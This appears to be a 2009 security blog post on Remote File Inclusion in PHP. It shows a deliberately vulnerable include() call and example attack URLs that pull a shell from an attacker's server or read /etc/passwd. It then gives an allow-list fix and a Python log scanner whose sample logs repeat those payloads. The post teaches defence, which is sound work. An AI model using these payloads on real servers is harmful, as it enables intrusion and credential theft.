Sunday, August 9, 2009

Remote File Inclusion

Take a look at the following code:


[...]

// the request parameter goes straight into include() without any validation
include($_GET['pag']);

[...]

?>

As we can see, the pag parameter ($_GET['pag']) is not validated before being used,
so a malicious user could include (or call, as you prefer to say) his own script via
the browser and gain access to the machine, or, as before, view a local file.

Example one: (gain access to the machine)

http://remote_host/inc.php?pag=[Evil Script - our shell located on our server]

Example two: (view files)

http://remote_host/inc.php?pag=/etc/passwd


Patching

The solution? Validate the input. One of many ways to validate the input is to keep
a list of acceptable pages (an allow-list) and only include a page that appears in
it, as shown below:


$pag = $_GET['pag'];

// allow-list: only these files may ever be passed to include()
$pages = array('index.php', 'alfa.php', 'beta.php', 'gamma.php');

// third argument = strict comparison, so only an exact string match passes
if(in_array($pag, $pages, true))
{
include($pag);
}
else
{
die("Hacking Attempt!");
}
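On the detection side, the two request shapes shown above (a URL or an absolute path in the pag parameter) are easy to spot in web server logs. The following is an added example, not code from the original post: it scans constructed Apache-style access log lines and flags any pag value that is not on the same allow-list used in the patch. The log lines, IP addresses and file names are made up for the example.

```python
"""Flag attempted remote/local file inclusion via the 'pag' parameter in access logs."""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Allow-list mirrors the patch above; anything else is suspicious.
ALLOWED_PAGES = {"index.php", "alfa.php", "beta.php", "gamma.php"}

# Apache combined log format: ip ident user [time] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def classify_page_param(value: str) -> str:
    """Return 'ok', 'remote_include', 'local_read' or 'unknown_page'."""
    v = unquote(value)  # second decode catches double-encoded values
    if re.match(r"^[a-z][a-z0-9+.-]*://", v, re.IGNORECASE):
        return "remote_include"   # http://..., ftp://..., or a PHP stream wrapper
    if v.startswith("/") or v.startswith("\\") or ".." in v or "\x00" in v:
        return "local_read"       # absolute path, traversal or null-byte truncation
    if v in ALLOWED_PAGES:
        return "ok"
    return "unknown_page"         # not an attack signature, but not allow-listed either

def scan_log(lines, param="pag"):
    """Return (ip, raw_value, verdict) for every request whose param is not 'ok'."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m["path"]).query)
        for raw in query.get(param, []):
            verdict = classify_page_param(raw)
            if verdict != "ok":
                findings.append((m["ip"], raw, verdict))
    return findings

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [09/Aug/2009:10:00:01 +0000] "GET /inc.php?pag=alfa.php HTTP/1.1" 200 512 "-" "Mozilla"',
    '198.51.100.7 - - [09/Aug/2009:10:00:02 +0000] "GET /inc.php?pag=http://203.0.113.9/c.txt HTTP/1.1" 200 88 "-" "curl"',
    '198.51.100.7 - - [09/Aug/2009:10:00:03 +0000] "GET /inc.php?pag=/etc/passwd HTTP/1.1" 200 1024 "-" "curl"',
    '198.51.100.7 - - [09/Aug/2009:10:00:04 +0000] "GET /inc.php?pag=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1024 "-" "curl"',
]

if __name__ == "__main__":
    for ip, raw, verdict in scan_log(SAMPLE_LOG):
        print(f"{verdict:15} {ip:15} pag={raw}")
```

A 200 status on a flagged request is the case worth escalating, since on the unpatched code it means the include actually succeeded.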
